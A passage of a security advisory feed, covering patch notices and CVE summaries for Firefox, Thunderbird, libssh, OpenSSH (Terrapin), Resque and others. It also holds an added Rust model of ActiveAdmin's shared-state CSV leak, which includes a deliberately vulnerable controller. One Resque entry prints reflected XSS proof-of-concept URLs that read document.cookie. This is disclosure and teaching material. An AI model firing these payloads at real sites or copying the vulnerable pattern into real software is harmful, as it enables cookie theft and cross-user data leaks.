The attacker would need access to the same ActiveAdmin application as the victim, and could exploit the issue by timing their request immediately before the moment they know someone else will request a CSV (e.g. via phishing), or by requesting CSVs frequently and hoping someone else makes a concurrent request.

### Patches
Versions 2.12.0 and above fixed the problem by completely removing the shared state.
https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:ACTIVEADMIN-2023-50448
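An added example, not ActiveAdmin's code, modelling the shared-collection race described above in Rust (the advisory concerns a Ruby application; the bug class is language independent). One controller object serves every request and parks "the collection to export" in a single slot; channels force Bob's prepare step to run between Alice's prepare and export, which is the timing the advisory describes, and Alice's export returns Bob's rows. The fixed controller keeps no per-request state, so the same three steps are simply run in that order. The controller names, the `Row` data and the channel-driven interleaving are constructed for this illustration.

```rust
// Added example, not ActiveAdmin's code: a Rust model of the leak in
// RUBYSEC:ACTIVEADMIN-2023-50448. One controller object serves every request
// and keeps "the collection to export" in a single slot. The Mutex rules out
// a data race, but a request landing between another user's prepare and
// export steps still swaps its own rows into that slot. Data is constructed.
use std::sync::{mpsc, Mutex};
use std::thread;

#[derive(Clone)]
struct Row {
    owner: &'static str,
    data: &'static str,
}

fn rows_for(user: &str, db: &[Row]) -> Vec<Row> {
    db.iter().filter(|r| r.owner == user).cloned().collect()
}

fn to_csv(rows: &[Row]) -> String {
    let mut out = String::from("owner,data\n");
    for r in rows {
        out.push_str(&format!("{},{}\n", r.owner, r.data));
    }
    out
}

/// Vulnerable shape: per-request data parked on a process-wide object.
#[derive(Default)]
struct SharedExportController {
    collection: Mutex<Option<Vec<Row>>>,
}

impl SharedExportController {
    fn prepare(&self, user: &str, db: &[Row]) {
        *self.collection.lock().unwrap() = Some(rows_for(user, db));
    }
    fn export_csv(&self) -> String {
        // Exports whatever sits in the slot now, whoever put it there.
        to_csv(&self.collection.lock().unwrap().take().unwrap_or_default())
    }
}

/// Fixed shape (the advisory's "completely removing the shared state"):
/// the collection travels through the request as a value.
struct StatelessExportController;

impl StatelessExportController {
    fn prepare(&self, user: &str, db: &[Row]) -> Vec<Row> {
        rows_for(user, db)
    }
    fn export_csv(&self, rows: &[Row]) -> String {
        to_csv(rows)
    }
}

/// Alice's request runs on one thread; channels force Bob's prepare to run
/// between Alice's prepare and export. Returns the CSV Alice receives.
fn alice_export_vulnerable(db: &[Row]) -> String {
    let ctrl = SharedExportController::default();
    let ctrl = &ctrl;
    let (alice_ready_tx, alice_ready_rx) = mpsc::channel::<()>();
    let (bob_done_tx, bob_done_rx) = mpsc::channel::<()>();
    thread::scope(|s| {
        let alice = s.spawn(move || {
            ctrl.prepare("alice", db);
            alice_ready_tx.send(()).unwrap();
            bob_done_rx.recv().unwrap();
            ctrl.export_csv()
        });
        s.spawn(move || {
            alice_ready_rx.recv().unwrap();
            ctrl.prepare("bob", db);
            bob_done_tx.send(()).unwrap();
        });
        alice.join().unwrap()
    })
}

/// Same three steps against the fixed controller. With no shared slot, the
/// interleaving cannot matter, so the steps are simply run in that order.
fn alice_export_fixed(db: &[Row]) -> String {
    let ctrl = StatelessExportController;
    let alice_rows = ctrl.prepare("alice", db);
    let _bob_rows = ctrl.prepare("bob", db); // Bob's request lands in between
    ctrl.export_csv(&alice_rows)
}

fn sample_db() -> Vec<Row> {
    vec![
        Row { owner: "alice", data: "alice-invoice-2023-12" },
        Row { owner: "bob", data: "bob-salary-report" },
    ]
}

fn main() {
    let db = sample_db();
    print!("vulnerable, Alice receives:\n{}", alice_export_vulnerable(&db));
    print!("fixed, Alice receives:\n{}", alice_export_fixed(&db));
}
```

The point worth keeping from this is that a lock does not repair the design: `SharedExportController` is free of data races, and still hands one user's export to another, because the state that should have been request-scoped lives on an object every request shares.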
18.12.2023 16:15:08alpinelinux[ALPINE:CVE-2023-47038] perl vulnerability[From CVE-2023-47038] A vulnerability was found in perl. This issue occurs when a crafted regular expression is compiled by perl, which can allow an attacker controlled byte buffer overflow in a heap allocated buffer.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-47038
18.12.2023 02:00:00gentoo[GLSA-202312-01] Leptonica: Multiple Vulnerabilities (high)Several vulnerabilities have been found in Leptonica, the worst of which could lead to arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-01
16.12.2023 19:35:07composer[PHP:ELIJAA-PHPMEMCACHEADMIN-2023-6027] PHPMemcachedAdmin vulnerable to cross-site scripting (XSS) via improper encodinghttps://secdb.nttzen.cloud/security-advisory/detail/PHP:ELIJAA-PHPMEMCACHEADMIN-2023-6027
18.12.2023 17:49:59rustsec[RUSTSEC-2023-0074] Some Ref methods are unsound with some type parametersThe `Ref` methods `into_ref`, `into_mut`, `into_slice`, and `into_slice_mut` are unsound and may allow safe code to exhibit undefined behavior when used with `Ref<B, T>` where `B` is [`cell::Ref`](https://doc.rust-lang.org/core/cell/struct.Ref.html) or [`cell::RefMut`](https://doc.rust-lang.org/core/cell/struct.RefMut.html). Note that these methods remain sound when used with `B` types other than `cell::Ref` or `cell::RefMut`. See https://github.com/google/zerocopy/issues/716 for a more in-depth analysis. The current plan is to yank the affected versions soon. See https://github.com/google/zerocopy/issues/679 for more detail.https://secdb.nttzen.cloud/security-advisory/detail/RUSTSEC-2023-0074
19.12.2023 23:32:36slackware[SSA:2023-353-03] mozilla-thunderbird
New mozilla-thunderbird packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/mozilla-thunderbird-115.6.0-i686-1_slack15.0.txz: Upgraded.
  This release contains security fixes and improvements.
  For more information, see:
    https://www.thunderbird.net/en-US/thunderbird/115.6.0/releasenotes/
    https://www.mozilla.org/en-US/security/advisories/mfsa2023-55/
    https://www.cve.org/CVERecord?id=CVE-2023-50762
    https://www.cve.org/CVERecord?id=CVE-2023-50761
    https://www.cve.org/CVERecord?id=CVE-2023-6856
    https://www.cve.org/CVERecord?id=CVE-2023-6857
    https://www.cve.org/CVERecord?id=CVE-2023-6858
    https://www.cve.org/CVERecord?id=CVE-2023-6859
    https://www.cve.org/CVERecord?id=CVE-2023-6860
    https://www.cve.org/CVERecord?id=CVE-2023-6861
    https://www.cve.org/CVERecord?id=CVE-2023-6862
    https://www.cve.org/CVERecord?id=CVE-2023-6863
    https://www.cve.org/CVERecord?id=CVE-2023-6864
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-thunderbird-115.6.0-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-thunderbird-115.6.0-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-thunderbird-115.6.0-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-thunderbird-115.6.0-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
0e49abb4aeaaf1aa1c351490359edfca  mozilla-thunderbird-115.6.0-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
4a5b24e971a60a2ed003969e43dccab5  mozilla-thunderbird-115.6.0-x86_64-1_slack15.0.txz

Slackware -current package:
809a9b3bbc20e55fc620281320cd5d40  xap/mozilla-thunderbird-115.6.0-i686-1.txz

Slackware x86_64 -current package:
89ed5bc481d539a621633e541b6e384d  xap/mozilla-thunderbird-115.6.0-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg mozilla-thunderbird-115.6.0-i686-1_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-353-03
19.12.2023 23:32:19 | slackware | [SSA:2023-353-02] mozilla-firefox

New mozilla-firefox packages are available for Slackware 15.0 and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/mozilla-firefox-115.6.0esr-i686-1_slack15.0.txz: Upgraded.
  This update contains security fixes and improvements.
  For more information, see:
    https://www.mozilla.org/en-US/firefox/115.6.0/releasenotes/
    https://www.mozilla.org/security/advisories/mfsa2023-54/
    https://www.cve.org/CVERecord?id=CVE-2023-6856
    https://www.cve.org/CVERecord?id=CVE-2023-6865
    https://www.cve.org/CVERecord?id=CVE-2023-6857
    https://www.cve.org/CVERecord?id=CVE-2023-6858
    https://www.cve.org/CVERecord?id=CVE-2023-6859
    https://www.cve.org/CVERecord?id=CVE-2023-6860
    https://www.cve.org/CVERecord?id=CVE-2023-6867
    https://www.cve.org/CVERecord?id=CVE-2023-6861
    https://www.cve.org/CVERecord?id=CVE-2023-6862
    https://www.cve.org/CVERecord?id=CVE-2023-6863
    https://www.cve.org/CVERecord?id=CVE-2023-6864
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/mozilla-firefox-115.6.0esr-i686-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/mozilla-firefox-115.6.0esr-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/xap/mozilla-firefox-115.6.0esr-i686-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/xap/mozilla-firefox-115.6.0esr-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
b2ac40b678fed2f2bc37fbaa8dcd9766 mozilla-firefox-115.6.0esr-i686-1_slack15.0.txz

Slackware x86_64 15.0 package:
fabd52a287faddb7543b2cce8d3faa1f mozilla-firefox-115.6.0esr-x86_64-1_slack15.0.txz

Slackware -current package:
75cae7b411df6f4ca4f4c8f18529b772 xap/mozilla-firefox-115.6.0esr-i686-1.txz

Slackware x86_64 -current package:
9388bad634352c43749aa19061157c38 xap/mozilla-firefox-115.6.0esr-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg mozilla-firefox-115.6.0esr-i686-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-353-02
19.12.2023 23:31:02 | slackware | [SSA:2023-353-01] libssh

New libssh packages are available for Slackware 14.2, 15.0, and -current to fix security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/libssh-0.10.6-i586-1_slack15.0.txz: Upgraded.
  This update fixes security issues:
    Command injection using proxycommand.
    Potential downgrade attack using strict kex.
    Missing checks for return values of MD functions.
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2023-6004
    https://www.cve.org/CVERecord?id=CVE-2023-48795
    https://www.cve.org/CVERecord?id=CVE-2023-6918
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/libssh-0.10.6-i586-1_slack14.2.txz

Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/libssh-0.10.6-x86_64-1_slack14.2.txz

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/libssh-0.10.6-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/libssh-0.10.6-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/libssh-0.10.6-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/libssh-0.10.6-x86_64-1.txz

**MD5 signatures**

Slackware 14.2 package:
df594d833d2b61430550c4a6249e8e16 libssh-0.10.6-i586-1_slack14.2.txz

Slackware x86_64 14.2 package:
697e225933eb11593ee2db6dca0d38a8 libssh-0.10.6-x86_64-1_slack14.2.txz

Slackware 15.0 package:
122816350a43ac336e1f48fcf3c0b2aa libssh-0.10.6-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
09688c662806fcfbc8b7f2b3bf408674 libssh-0.10.6-x86_64-1_slack15.0.txz

Slackware -current package:
c3a0ff73b4a2d523f99a5e06b4b8df75 l/libssh-0.10.6-i586-1.txz

Slackware x86_64 -current package:
01fba0c880daaf7536dcf31cc5553708 l/libssh-0.10.6-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg libssh-0.10.6-i586-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-353-01
19.12.2023 15:08:22 | ubuntu | [USN-6561-1] libssh vulnerability | A security issue was fixed in libssh. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6561-1

19.12.2023 15:02:10 | ubuntu | [USN-6560-1] OpenSSH vulnerabilities | Several security issues were fixed in OpenSSH. | https://secdb.nttzen.cloud/security-advisory/detail/USN-6560-1

19.12.2023 02:15:08 | alpinelinux | [ALPINE:CVE-2023-6918] libssh vulnerability

[From CVE-2023-6918] A flaw was found in libssh, which implements an abstract layer for message digest (MD) operations implemented by the different supported crypto backends. The return values from these were not properly checked, which could cause failures in low-memory situations, NULL dereferences, crashes, or usage of uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection.

https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-6918
19.12.2023 02:00:00 | mozilla | [MFSA-2023-54] Security Vulnerabilities fixed in Firefox ESR 115.6 (high)

- CVE-2023-6856: Heap-buffer-overflow affecting WebGL DrawElementsInstanced method with Mesa VM driver (high)
  The WebGL `DrawElementsInstanced` method was susceptible to a heap buffer overflow when used on systems with the Mesa VM driver. This issue could allow an attacker to perform remote code execution and sandbox escape.
- CVE-2023-6857: Symlinks may resolve to smaller than expected buffers (moderate)
  When resolving a symlink, a race may occur where the buffer passed to `readlink` may actually be smaller than necessary.
  *This bug only affects Firefox on Unix-based operating systems (Android, Linux, MacOS). Windows is unaffected.*
- CVE-2023-6858: Heap buffer overflow in nsTextFragment (moderate)
  Firefox was susceptible to a heap buffer overflow in `nsTextFragment` due to insufficient OOM handling.
- CVE-2023-6859: Use-after-free in PR_GetIdentitiesLayer (moderate)
  A use-after-free condition affected TLS socket creation when under memory pressure.
- CVE-2023-6860: Potential sandbox escape due to VideoBridge lack of texture validation (moderate)
  The `VideoBridge` allowed any content process to use textures produced by remote decoders. This could be abused to escape the sandbox.
- CVE-2023-6861: Heap buffer overflow affected nsWindow::PickerOpen(void) in headless mode (moderate)
  The `nsWindow::PickerOpen(void)` method was susceptible to a heap buffer overflow when running in headless mode.
- CVE-2023-6862: Use-after-free in nsDNSService (moderate)
  A use-after-free was identified in `nsDNSService::Init`. This issue appears to manifest rarely during start-up.
- CVE-2023-6863: Undefined behavior in ShutdownObserver() (low)
  The `ShutdownObserver()` was susceptible to potentially undefined behavior due to its reliance on a dynamic type that lacked a virtual destructor.
- CVE-2023-6864: Memory safety bugs fixed in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6 (high)
  Memory safety bugs present in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
- CVE-2023-6865: Potential exposure of uninitialized data in EncryptingOutputStream (high)
  `EncryptingOutputStream` was susceptible to exposing uninitialized data. This issue could only be abused in order to write data to a local disk, which may have implications for private browsing mode.
- CVE-2023-6867: Clickjacking permission prompts using the popup transition (moderate)
  The timing of a button click causing a popup to disappear was approximately the same length as the anti-clickjacking delay on permission prompts. It was possible to use this fact to surprise users by luring them to click where the permission grant button would be about to appear.

https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-54
19.12.2023 02:00:00 | mozilla | [MFSA-2023-55] Security Vulnerabilities fixed in Thunderbird 115.6 (high)

- CVE-2023-50761: S/MIME signature accepted despite mismatching message date (high)
  The signature of a digitally signed S/MIME email message may optionally specify the signature creation date and time. If present, Thunderbird did not compare the signature creation date with the message date and time, and displayed a valid signature despite a date or time mismatch. This could be used to give recipients the impression that a message was sent at a different date or time.
- CVE-2023-50762: Truncated signed text was shown with a valid OpenPGP signature (high)
  When processing a PGP/MIME payload that contains digitally signed text, the first paragraph of the text was never shown to the user. This is because the text was interpreted as a MIME message and the first paragraph was always treated as an email header section. A digitally signed text from a different context, such as a signed GIT commit, could be used to spoof an email message.
- CVE-2023-6856: Heap-buffer-overflow affecting WebGL DrawElementsInstanced method with Mesa VM driver (high)
  The WebGL `DrawElementsInstanced` method was susceptible to a heap buffer overflow when used on systems with the Mesa VM driver. This issue could allow an attacker to perform remote code execution and sandbox escape.
- CVE-2023-6857: Symlinks may resolve to smaller than expected buffers (moderate)
  When resolving a symlink, a race may occur where the buffer passed to `readlink` may actually be smaller than necessary.
  *This bug only affects Thunderbird on Unix-based operating systems (Android, Linux, MacOS). Windows is unaffected.*
- CVE-2023-6858: Heap buffer overflow in nsTextFragment (moderate)
  Thunderbird was susceptible to a heap buffer overflow in `nsTextFragment` due to insufficient OOM handling.
- CVE-2023-6859: Use-after-free in PR_GetIdentitiesLayer (moderate)
  A use-after-free condition affected TLS socket creation when under memory pressure.
- CVE-2023-6860: Potential sandbox escape due to VideoBridge lack of texture validation (moderate)
  The `VideoBridge` allowed any content process to use textures produced by remote decoders. This could be abused to escape the sandbox.
- CVE-2023-6861: Heap buffer overflow affected nsWindow::PickerOpen(void) in headless mode (moderate)
  The `nsWindow::PickerOpen(void)` method was susceptible to a heap buffer overflow when running in headless mode.
- CVE-2023-6862: Use-after-free in nsDNSService (moderate)
  A use-after-free was identified in `nsDNSService::Init`. This issue appears to manifest rarely during start-up.
- CVE-2023-6863: Undefined behavior in ShutdownObserver() (low)
  The `ShutdownObserver()` was susceptible to potentially undefined behavior due to its reliance on a dynamic type that lacked a virtual destructor.
- CVE-2023-6864: Memory safety bugs fixed in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6 (high)
  Memory safety bugs present in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-55
19.12.2023 02:00:00 | mozilla | [MFSA-2023-56] Security Vulnerabilities fixed in Firefox 121 (high)

- CVE-2023-6135: NSS susceptible to "Minerva" attack (high)
  Multiple NSS NIST curves were susceptible to a side-channel attack known as "Minerva". This attack could potentially allow an attacker to recover the private key.
- CVE-2023-6856: Heap-buffer-overflow affecting WebGL DrawElementsInstanced method with Mesa VM driver (high)
  The WebGL `DrawElementsInstanced` method was susceptible to a heap buffer overflow when used on systems with the Mesa VM driver. This issue could allow an attacker to perform remote code execution and sandbox escape.
- CVE-2023-6857: Symlinks may resolve to smaller than expected buffers (moderate)
  When resolving a symlink, a race may occur where the buffer passed to `readlink` may actually be smaller than necessary.
  *This bug only affects Firefox on Unix-based operating systems (Android, Linux, MacOS). Windows is unaffected.*
- CVE-2023-6858: Heap buffer overflow in nsTextFragment (moderate)
  Firefox was susceptible to a heap buffer overflow in `nsTextFragment` due to insufficient OOM handling.
- CVE-2023-6859: Use-after-free in PR_GetIdentitiesLayer (moderate)
  A use-after-free condition affected TLS socket creation when under memory pressure.
- CVE-2023-6860: Potential sandbox escape due to VideoBridge lack of texture validation (moderate)
  The `VideoBridge` allowed any content process to use textures produced by remote decoders. This could be abused to escape the sandbox.
- CVE-2023-6861: Heap buffer overflow affected nsWindow::PickerOpen(void) in headless mode (moderate)
  The `nsWindow::PickerOpen(void)` method was susceptible to a heap buffer overflow when running in headless mode.
- CVE-2023-6863: Undefined behavior in ShutdownObserver() (low)
  The `ShutdownObserver()` was susceptible to potentially undefined behavior due to its reliance on a dynamic type that lacked a virtual destructor.
- CVE-2023-6864: Memory safety bugs fixed in Firefox 121, Firefox ESR 115.6, and Thunderbird 115.6 (high)
  Memory safety bugs present in Firefox 120, Firefox ESR 115.5, and Thunderbird 115.5. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
- CVE-2023-6865: Potential exposure of uninitialized data in EncryptingOutputStream (high)
  `EncryptingOutputStream` was susceptible to exposing uninitialized data. This issue could only be abused in order to write data to a local disk, which may have implications for private browsing mode.
- CVE-2023-6866: TypedArrays lack sufficient exception handling (moderate)
  TypedArrays can be fallible and lacked proper exception handling. This could lead to abuse in other APIs which expect TypedArrays to always succeed.
- CVE-2023-6867: Clickjacking permission prompts using the popup transition (moderate)
  The timing of a button click causing a popup to disappear was approximately the same length as the anti-clickjacking delay on permission prompts. It was possible to use this fact to surprise users by luring them to click where the permission grant button would be about to appear.
- CVE-2023-6868: WebPush requests on Firefox for Android did not require VAPID key (moderate)
  In some instances, the user-agent would allow push requests which lacked a valid VAPID even though the push manager subscription defined one. This could allow empty messages to be sent from unauthorized parties.
  *This bug only affects Firefox on Android.*
- CVE-2023-6869: Content can paint outside of sandboxed iframe (low)
  A `<dialog>` element could have been manipulated to paint content outside of a sandboxed iframe. This could allow untrusted content to display under the guise of trusted content.
- CVE-2023-6870: Android Toast notifications may obscure fullscreen event notifications (low)
  Applications which spawn a Toast notification in a background thread may have obscured fullscreen notifications displayed by Firefox.
  *This issue only affects Android versions of Firefox and Firefox Focus.*
- CVE-2023-6871: Lack of protocol handler warning in some instances (low)
  Under certain conditions, Firefox did not display a warning when a user attempted to navigate to a new protocol handler.
- CVE-2023-6872: Browsing history leaked to syslogs via GNOME (low)
  Browser tab titles were being leaked by GNOME to system logs. This could potentially expose the browsing habits of users running in a private tab.
- CVE-2023-6873: Memory safety bugs fixed in Firefox 121 (high)
  Memory safety bugs present in Firefox 120. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.

https://secdb.nttzen.cloud/security-advisory/detail/MFSA-2023-56
18.12.2023 19:04:19 | suse | [SUSE-SU-2023:4895-1] Security update for libsass (moderate) | Security update for libsass | https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4895-1

18.12.2023 18:15:10 | alpinelinux | [ALPINE:CVE-2023-48795] openssh, libssh, py3-paramiko, erlang, dropbear, putty vulnerability

[From CVE-2023-48795] The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD 1.3.9rc1, ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust; and there could be effects on Bitvise SSH through 9.31.

https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-48795
19.12.2023 16:16:37 | rubysec | [RUBYSEC:RESQUE-2023-50724] Resque vulnerable to Reflected Cross Site Scripting through pathnames (medium)

### Impact

resque-web in resque versions before 2.1.0 is vulnerable to reflected XSS through the current_queue parameter in the path of the queues endpoint.

### Patches

v2.1.0

### Workarounds

No known workarounds at this time. It is recommended to not click on 3rd party or untrusted links to the resque-web interface until you have patched your application.

### References

https://github.com/resque/resque/issues/1679
https://github.com/resque/resque/pull/1687

https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:RESQUE-2023-50724

19.12.2023 16:16:37 | rubysec | [RUBYSEC:RESQUE-2023-50725] Resque vulnerable to reflected XSS in resque-web failed and queues lists (medium)

### Impact

The following paths in resque-web have been found to be vulnerable to reflected XSS:

```
/failed/?class=<script>alert(document.cookie)</script>
/queues/><img src=a onerror=alert(document.cookie)>
```

### Patches

v2.2.1

### Workarounds

No known workarounds at this time. It is recommended to not click on 3rd party or untrusted links to the resque-web interface until you have patched your application.

### References

https://github.com/resque/resque/pull/1790

https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:RESQUE-2023-50725

19.12.2023 16:16:37 | rubysec | [RUBYSEC:RESQUE-2023-50727] Resque vulnerable to reflected XSS in Queue Endpoint (medium)

### Impact

Reflected XSS can be performed using the current_queue portion of the path on the /queues endpoint of resque-web.

### Patches

v2.6.0

### Workarounds

No known workarounds at this time. It is recommended to not click on 3rd party or untrusted links to the resque-web interface until you have patched your application.

### References

https://github.com/resque/resque/pull/1865

https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:RESQUE-2023-50727

19.12.2023 16:16:37 | rubysec | [RUBYSEC:RESQUE-SCHEDULER-2022-44303] Resque Scheduler Reflected XSS In Delayed Jobs View (medium)

### Impact

Resque Scheduler versions 1.27.4 and above are affected by a cross-site scripting vulnerability. A remote attacker can inject JavaScript code into the "{schedule_job}" or "args" parameter in /resque/delayed/jobs/{schedule_job}?args={args_id} to execute JavaScript on the client side.

### Patches

Fixed in v4.10.2

### Workarounds

No known workarounds at this time. It is recommended to not click on 3rd party or untrusted links to the resque-web interface until you have patched your application.

### References

* https://nvd.nist.gov/vuln/detail/CVE-2022-44303
* https://github.com/resque/resque-scheduler/issues/761
* https://github.com/resque/resque/issues/1885
* https://github.com/resque/resque-scheduler/pull/780
* https://github.com/resque/resque-scheduler/pull/783

https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:RESQUE-SCHEDULER-2022-44303
20.12.2023 23:14:12 | slackware | [SSA:2023-354-01] proftpd

New proftpd packages are available for Slackware 14.0, 14.1, 14.2, 15.0, and -current to fix a security issue.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/proftpd-1.3.8b-i586-1_slack15.0.txz: Upgraded.
  This update fixes a security issue:
    mod_sftp: implemented mitigations for "Terrapin" SSH attack.
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2023-48795
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/proftpd-1.3.8b-i486-1_slack14.0.txz

Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/proftpd-1.3.8b-x86_64-1_slack14.0.txz

Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/proftpd-1.3.8b-i486-1_slack14.1.txz

Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/proftpd-1.3.8b-x86_64-1_slack14.1.txz

Updated package for Slackware 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/proftpd-1.3.8b-i586-1_slack14.2.txz

Updated package for Slackware x86_64 14.2:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/proftpd-1.3.8b-x86_64-1_slack14.2.txz

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/proftpd-1.3.8b-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/proftpd-1.3.8b-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/proftpd-1.3.8b-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/proftpd-1.3.8b-x86_64-1.txz

**MD5 signatures**

Slackware 14.0 package:
79ebaf263d088d62cf7b0897e3908e79 proftpd-1.3.8b-i486-1_slack14.0.txz

Slackware x86_64 14.0 package:
c0e6a80bc274087fe9f738bd52c4ae5b proftpd-1.3.8b-x86_64-1_slack14.0.txz

Slackware 14.1 package:
0622b22327bf55b71a5f136eafbbffbd proftpd-1.3.8b-i486-1_slack14.1.txz

Slackware x86_64 14.1 package:
718ea14965856be15d8dad5d730e28fd proftpd-1.3.8b-x86_64-1_slack14.1.txz

Slackware 14.2 package:
af54155ff2e9a9d5cb2caefb24f5fb95 proftpd-1.3.8b-i586-1_slack14.2.txz

Slackware x86_64 14.2 package:
192ced161307e17ad8e693408488d88e proftpd-1.3.8b-x86_64-1_slack14.2.txz

Slackware 15.0 package:
